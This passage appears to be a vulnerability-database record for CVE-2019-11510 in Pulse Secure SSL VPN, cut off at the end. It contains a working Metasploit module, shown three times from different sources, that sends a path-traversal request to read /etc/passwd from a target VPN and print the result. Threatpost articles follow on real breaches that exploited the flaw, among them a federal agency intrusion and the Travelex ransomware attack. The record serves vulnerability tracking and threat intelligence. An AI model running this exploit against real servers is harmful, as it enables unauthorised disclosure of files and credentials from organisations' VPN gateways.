'msf/core'\nclass MetasploitModule < Msf::Auxiliary\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Post::File\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'Pulse Secure - System file leak',\n\t\t\t'Description' => %q{\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\n This exploit reads /etc/passwd as a proof of concept\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\t\t\t},\n\t\t\t'References' =>\n\t\t\t [\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\n\t\t\t ],\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t 'DefaultOptions' =>\n\t\t {\n\t\t 'RPORT' => 443,\n\t\t 'SSL' => true\n\t\t },\n\t\t\t))\n\n\tend\n\n\n\tdef run()\n\t\tprint_good(\"Checking target...\")\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\n\n\t\tif res && res.code == 200\n\t\t\tprint_good(\"Target is Vulnerable!\")\n\t\t\tdata = res.body\n\t\t\tcurrent_host = datastore['RHOST']\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\n\t\t\tFile.delete(filename) if File.exist?(filename)\n\t\t\tfile_local_write(filename, data)\n\t\t\tprint_good(\"Parsing file.......\")\n\t\t\tparse()\n\t\telse\n\t\t\tif(res && res.code == 404)\n\t\t\t\tprint_error(\"Target not Vulnerable\")\n\t\t\telse\n\t\t\t\tprint_error(\"Ooof, try again...\")\n\t\t\tend\n\t\tend\n\tend\n\tdef parse()\n\t\tcurrent_host = datastore['RHOST']\n\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\n\t words = 0\n\t while (line = fileObj.gets)\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\n\t \tfor ar in array_data\n\t \t\tif ar != \"............................................................\"\n\t \t\t\tprint_good(ar)\n\t \t\tend\n\t \tend\n\t \t#print_good(printable_data)\n\n\t\tend\n\t\tfileObj.close\n\tend\nend", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2019-08-22T05:38:44", "description": "", "published": "2019-08-21T00:00:00", "type": "packetstorm", "title": "Pulse Secure SSL VPN 8.1R15.1 / 8.2 / 8.3 / 9.0 Arbitrary File Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "PACKETSTORM:154176", "href": "https://packetstormsecurity.com/files/154176/Pulse-Secure-SSL-VPN-8.1R15.1-8.2-8.3-9.0-Arbitrary-File-Disclosure.html", "sourceData": "`# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit) \n# Google Dork: inurl:/dana-na/ filetype:cgi \n# Date: 8/20/2019 \n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera \n# Vendor Homepage: https://pulsesecure.net \n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n# Tested on: Linux \n# CVE : CVE-2019-11510 \nrequire 'msf/core' \nclass MetasploitModule < Msf::Auxiliary \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Post::File \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Pulse Secure - System file leak', \n'Description' => %q{ \nPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests. \nThis exploit reads /etc/passwd as a proof of concept \nThis vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 \n}, \n'References' => \n[ \n[ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ] \n], \n'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ], \n'License' => MSF_LICENSE, \n'DefaultOptions' => \n{ \n'RPORT' => 443, \n'SSL' => true \n}, \n)) \n \nend \n \n \ndef run() \nprint_good(\"Checking target...\") \nres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342) \n \nif res && res.code == 200 \nprint_good(\"Target is Vulnerable!\") \ndata = res.body \ncurrent_host = datastore['RHOST'] \nfilename = \"msf_sslwebsession_\"+current_host+\".bin\" \nFile.delete(filename) if File.exist?(filename) \nfile_local_write(filename, data) \nprint_good(\"Parsing file.......\") \nparse() \nelse \nif(res && res.code == 404) \nprint_error(\"Target not Vulnerable\") \nelse \nprint_error(\"Ooof, try again...\") \nend \nend \nend \ndef parse() \ncurrent_host = datastore['RHOST'] \n \nfileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\") \nwords = 0 \nwhile (line = fileObj.gets) \nprintable_data = line.gsub(/[^[:print:]]/, '.') \narray_data = printable_data.scan(/.{1,60}/m) \nfor ar in array_data \nif ar != \"............................................................\" \nprint_good(ar) \nend \nend \n#print_good(printable_data) \n \nend \nfileObj.close \nend \nend \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/154176/pulsesecure-disclose.rb.txt"}], "exploitdb": [{"lastseen": "2019-08-21T09:35:48", "description": "", "published": "2019-08-21T00:00:00", "type": "exploitdb", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "EDB-ID:47297", "href": "https://www.exploit-db.com/exploits/47297", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Date: 8/20/2019\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/47297"}], "threatpost": [{"lastseen": "2020-10-16T22:09:34", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510"], "description": "A federal agency has suffered a successful espionage-related cyberattack that led to a backdoor and multistage malware being dropped on its network.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) [issued an alert](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>) on Thursday, not naming the agency but providing technical details of the attack. Hackers, it said, gained initial access by using employees\u2019 legitimate Microsoft Office 365 log-in credentials to sign onto an agency computer remotely.\n\n\u201cThe cyber-threat actor had valid access credentials for multiple users\u2019 Microsoft Office 365 (O365) accounts and domain administrator accounts,\u201d according to CISA. \u201cFirst, the threat actor logged into a user\u2019s O365 account from Internet Protocol (IP) address 91.219.236[.]166 and then browsed pages on a SharePoint site and downloaded a file. The cyber-threat actor connected multiple times by Transmission Control Protocol (TCP) from IP address 185.86.151[.]223 to the victim organization\u2019s virtual private network (VPN) server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for how the attackers managed to get their hands on the credentials in the first place, CISA\u2019s investigation turned up no definitive answer \u2013 however, it speculated that it could have been a result of a vulnerability exploit that it said has been rampant across government networks.\n\n\u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability\u2014CVE-2019-11510\u2014in Pulse Secure,\u201d according to the alert. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\nThe patch was issued in April of 2019, but the Department of Homeland Security (DHS) in April of this year [noted that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) before the patches were deployed, bad actors were able to compromise Active Directory accounts via the flaw \u2013 so, even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAfter initial access, the group set about carrying out reconnaissance on the network. First they logged into an agency O365 email account to view and download help-desk email attachments with \u201cIntranet access\u201d and \u201cVPN passwords\u201d in the subject lines \u2013 and it uncovered Active Directory and Group Policy key, changing a registry key for the Group Policy.\n\n\u201cImmediately afterward, the threat actor used common Microsoft Windows command line processes\u2014conhost, ipconfig, net, query, netstat, ping and whoami, plink.exe\u2014to enumerate the compromised system and network,\u201d according to CISA.\n\nThe next step was to connect to a virtual private server (VPS) through a Windows Server Message Block (SMB) client, using an alias secure identifier account that the group had previously created to log into it; then, they executed plink.exe, a remote administration utility.\n\nAfter that, they connected to command-and-control (C2), and installed a custom malware with the file name \u201cinetinfo.exe.\u201d The attackers also set up a locally mounted remote share, which \u201callowed the actor to freely move during its operations while leaving fewer artifacts for forensic analysis,\u201d CISA noted.\n\nThe cybercriminals, while logged in as an admin, created a scheduled task to run the malware, which turned out to be a dropper for additional payloads.\n\n\u201cinetinfo.exe is a unique, multi-stage malware used to drop files,\u201d explained CISA. \u201cIt dropped system.dll and 363691858 files and a second instance of inetinfo.exe. The system.dll from the second instance of inetinfo.exe decrypted 363691858 as binary from the first instance of inetinfo.exe. The decrypted 363691858 binary was injected into the second instance of inetinfo.exe to create and connect to a locally named tunnel. The injected binary then executed shellcode in memory that connected to IP address 185.142.236[.]198, which resulted in download and execution of a payload.\u201d\n\nIt added, \u201cThe cyber-threat actor was able to overcome the agency\u2019s anti-malware protection, and inetinfo.exe escaped quarantine.\u201d\n\nCISA didn\u2019t specify what the secondary payload was \u2013 Threatpost has reached out for additional information.\n\nThe threat group meanwhile also established a backdoor in the form of a persistent Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy.\n\n\u201cThe proxy allowed connections between an attacker-controlled remote server and one of the victim organization\u2019s file servers,\u201d according to CISA. \u201cThe reverse SOCKS proxy communicated through port 8100. This port is normally closed, but the attacker\u2019s malware opened it.\u201d\n\nA local account was then created, which was used for data collection and exfiltration. From the account, the cybercriminals browsed directories on victim file servers; copied files from users\u2019 home directories; connected an attacker-controlled VPS with the agency\u2019s file server (via a reverse SMB SOCKS proxy); and exfiltrated all the data using the Microsoft Windows Terminal Services client.\n\nThe attack has been remediated \u2013 and it\u2019s unclear when it took place. CISA said that it\u2019s intrusion-detection system was thankfully able to eventually flag the activity, however.\n\n\u201cCISA became aware\u2014via EINSTEIN, CISA\u2019s intrusion-detection system that monitors federal civilian networks\u2014of a potential compromise of a federal agency\u2019s network,\u201d according to the alert. \u201cIn coordination with the affected agency, CISA conducted an incident response engagement, confirming malicious activity.\u201d\n", "modified": "2020-09-24T20:47:40", "published": "2020-09-24T20:47:40", "id": "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "href": "https://threatpost.com/feds-cyberattack-data-stolen/159541/", "type": "threatpost", "title": "Feds Hit with Successful Cyberattack, Data Stolen", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-02T22:02:21", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-11539"], "description": "The Sodinokibi ransomware strain is apparently behind the New Year\u2019s Eve attack on foreign currency-exchange giant Travelex, which has left its customers and banking partners stranded without its services.\n\nThe criminals behind the attack are demanding a six-figure sum in return for the decryption key, according to reports, and are directing the company to a payment website hosted in Colorado.\n\n\u201cIt is just business. We absolutely do not care about you or your details, except getting benefits. If we do not do our work and liabilities \u2013 nobody will not co-operate with us. It is not in our interests,\u201d the [readme file](<https://www.computerweekly.com/news/252476283/Cyber-gangsters-demand-payment-from-Travelex-after-Sodinokibi-attack>) for the ransomware, obtained by Computer Weekly, said. \u201cIf you do not cooperate with our service \u2013 for us it does not matter. But you will lose your time and your data, cause just we have the private key. In practice time is much more valuable than money.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSodinokibi, also known as REvil, appeared in April 2019. It has been responsible for a string of high-profile hits, including attacks on [22 Texas municipalities](<https://threatpost.com/the-texas-ransomware-attacks-a-gamechanger-for-cybercriminals/147597/>) and [various dentist offices](<https://threatpost.com/news-wrap-dentist-offices-hit-by-ransomware-venmo-faces-privacy-firestorm/147856/>) around the country. Researchers from Secureworks Counter Threat Unit (CTU) believe that the group behind the infamous GandCrab ransomware, which earlier this year [claimed to have retired](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>), is actually [responsible for Sodinokibi](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>), given that the string decoding functions and other code aspects employed by Sodinokibi and GandCrab are nearly identical.\n\nTravelex, a ubiquitous fixture at airports, provides foreign-exchange services in 70 countries across more than 1,200 retail branches. The attack resulted in Travelex websites in at least 20 countries going offline, left its retail locations to carry out tasks manually, and many customers remain stranded without travel money. Its global banking partners, including Barclays, First Direct, HSBC, Sainsbury\u2019s Bank, Tesco and Virgin Money, have also been left adrift with no way to buy or sell foreign currency.\n\nIt\u2019s unclear whether the company plans to pay the ransom, and it has offered no timeline on cleanup. While the company has [admitted the attack](<https://threatpost.com/travelex-knocked-offline-malware-attack/151522/>), many of its websites merely are showing a [warning screen](<https://www.travelex.com/news-room>) saying that they\u2019re down for \u201cplanned maintenance.\u201d\n\nIt has not returned Threatpost\u2019s requests for comment.\n\n## Unpatched Pulse Secure Servers\n\nThe attack could have been successful in part because Travelex took several months to patch critical vulnerabilities in its Pulse Secure VPN servers, according to Bad Packets.\n\nPulse Secure offers a popular enterprise remote access family of products. The company issued an urgent patch for two critical vulnerabilities in its Zero Trust VPN product in April. CVE-2019-11510 is an arbitrary file reading vulnerability allows sensitive information disclosure enabling unauthenticated attackers to access private keys and user passwords, according to the advisory; further exploitation using the leaked credentials can lead to remote command injection (CVE-2019-11539) and allow attackers to gain access inside private VPN networks.\n\n\u201cThat vulnerability is incredibly bad \u2014 it allows people without valid usernames and passwords to remotely connect to the corporate network the device is supposed to protect, turn off multi-factor authentication controls, remotely view logs and cached passwords in plain text (including Active Directory account passwords),\u201d explained researcher Kevin Beaumont (a.k.a. Gossi the Dog), [in a posting](<https://doublepulsar.com/big-game-ransomware-being-delivered-to-organisations-via-pulse-secure-vpn-bd01b791aad9>) this week.\n\nHe said that in August, he became aware that public exploits had been made available and that cybercriminals including APTs were actively scanning the internet for the issue (using public tools like the Shodan search engine). A corresponding [report from Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) that month indicated that major cyberattacks could be imminent.\n\n\u201cOn August 25th 2019, Bad Packets scanned the internet and [found almost 15,000 endpoints](<https://twitter.com/bad_packets/status/1165574263975186433>) across the world had the issue directly exploitable,\u201d Beaumont noted. \u201cThose results included networks at governments across the world \u2014 many incredibly sensitive organizations included \u2014 and basically a list of the world\u2019s largest companies. It was clear organizations were simply [not patching](<https://twitter.com/GossiTheDog/status/1213532072201084929>).\u201d\n\nOne of these organizations was Travelex, which had seven unsecured Pulse Secure servers, according to Bad Packets; it also said that the company waited until November \u2013 eight months after the vulnerability disclosure \u2013 to patch the issues.\n\n> We notified Travelex about their vulnerable Pulse Secure VPN servers on September 13, 2019.\n> \n> No response. [pic.twitter.com/lCjk7IY3OM](<https://t.co/lCjk7IY3OM>)\n> \n> \u2014 Bad Packets Report (@bad_packets) [January 4, 2020](<https://twitter.com/bad_packets/status/1213536922825420800?ref_src=twsrc%5Etfw>)\n\nBad Packets [indicated](<https://twitter.com/bad_packets/status/1214255496900665344>) that this lag time could have provided the window in which the cybergang infiltrated the Travelex network \u2013 a speculation that is somewhat supported by Pulse Secure itself, which issued [a statement](<https://twitter.com/zackwhittaker/status/1214315001844031488/photo/1>) this week that it has indeed seen the Sodinokibi ransomware being delivered via exploits for the vulnerabilities.\n\n\u201cThe ransomware situation at Travelex shines a harsh spotlight on the potential devastation of a cybersecurity incident,\u201d Jonathan Knudsen, senior security strategist at Synopsys, said in an emailed statement. \u201cThe lost business and negative publicity from a scenario such as this can be crushing. Ransomware continues to be a popular tool for cybercriminals\u2026If you fall victim to a ransomware attack, you must have a plan ready to execute. The plan should include removing infected systems from your network, wiping them and reinstalling the operating system and applications, then restoring data from your backups.\u201d\n\n_**Concerned about mobile security? **_[**Check out our free Threatpost webinar,**](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>) _**Top 8 Best Practices for Mobile App Security**__**, on Jan. 22 at 2 p.m. ET. **_**_Poorly secured apps can lead to malware, data breaches and legal/regulatory trouble. Join our experts to discuss the secrets of building a secure mobile strategy, one app at a time._**_** **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/7679724086205178371?source=art>)_**.**_\n", "modified": "2020-01-07T17:04:09", "published": "2020-01-07T17:04:09", "id": "THREATPOST:C535D98924152E648A3633199DAC0F1E", "href": "https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/", "type": "threatpost", "title": "Sodinokibi Ransomware Behind Travelex Fiasco: Report", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:21:11", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2020-24400", "CVE-2020-24407"], "description": "The Department of Homeland Security (DHS) is urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN.\n\nDHS warns that the Pulse Secure VPN patches may have come too late. Government officials say before the patches were deployed, bad actors were able to compromise Active Directory accounts. So even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAt the heart of the advisory is a known, critical Pulse Secure [arbitrary file reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers to gain access to a victim\u2019s networks. Tracked as CVE-2019-11510, the bug was patched by Pulse Secure in April 2019, and many companies impacted by the flaw issued the fix to address the vulnerability since then.\n\nBut in many cases the damage is already done. Attackers have already exploited the flaw to snatch up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, DHS\u2019 Cybersecurity and Infrastructure Security Agency (CISA) warned in the Thursday alert.\n\n[](<https://register.gotowebinar.com/register/4136632530104301068?source=art>)\n\n\u201cCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510,\u201d according to [CISA\u2019s alert](<https://www.us-cert.gov/ncas/alerts/aa20-107a>). \u201cIf\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\u201d\n\nThe flaw exists in Pulse Connect Secure, Pulse Secure\u2019s SSL VPN (virtual private network) platform used by various enterprises and organizations. Exploitation of the vulnerability is simple, which is why it received a 10 out of 10 CVSS ranking. Attackers can exploit the flaw to get initial access on the VPN server, where they\u2019re able to access credentials. A proof of concept (PoC) [was made public](<https://www.tenable.com/blog/cve-2019-11510-proof-of-concept-available-for-arbitrary-file-disclosure-in-pulse-connect-secure>) in August 2019. During that time, Troy Mursch with Bad Packets identified [over 14,500 Pulse Secure VPN endpoints that were vulnerable](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) to this flaw. In a more recent scan, [on Jan. 3, 2020](<https://twitter.com/bad_packets/status/1213273678525296640>), Mursch said 3,825 endpoints remain vulnerable.\n\nOne such vulnerable organization was Travelex, which took several months to patch critical vulnerabilities in its seven Pulse Secure VPN servers, according to Bad Packets. Some have speculated the [lag time in patching](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) these VPNs led to the eventual [massive ransomware](<https://threatpost.com/travelex-knocked-offline-malware-attack/151522/>) attack against Travelex.\n\nVarious other cybercriminals have targeted the Pulse Secure VPN flaw to compromise organizations, such as Iranian state sponsored hackers who leveraged the flaw to [conduct cyber-espionage campaigns](<https://www.clearskysec.com/fox-kitten/>) against dozens of companies in Israel.\n\nIn addition to urging organizations update credentials on accounts in Active Directory, which is the database keeps track of all organizations\u2019 user accounts and passwords, CISA has also [released a new tool](<https://github.com/cisagov/check-your-pulse>) to help network admins sniff out any indicators of compromise on their systems that are related to the flaw.\n\n\u201cCISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks,\u201d the advisory said.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "modified": "2020-04-17T20:56:34", "published": "2020-04-17T20:56:34", "id": "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "href": "https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/", "type": "threatpost", "title": "DHS Urges Pulse Secure VPN Users To Update Passwords", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-01T21:47:35", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "modified": "2020-09-01T13:35:19", "published": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-21T15:44:32", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "description": "A critical zero-day security vulnerability in Pulse Secure VPN devices has been exploited by nation-state actors to launch cyberattacks against U.S. defense, finance and government targets, as well as victims in Europe, researchers said.\n\n[](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\nThe flaw, tracked as 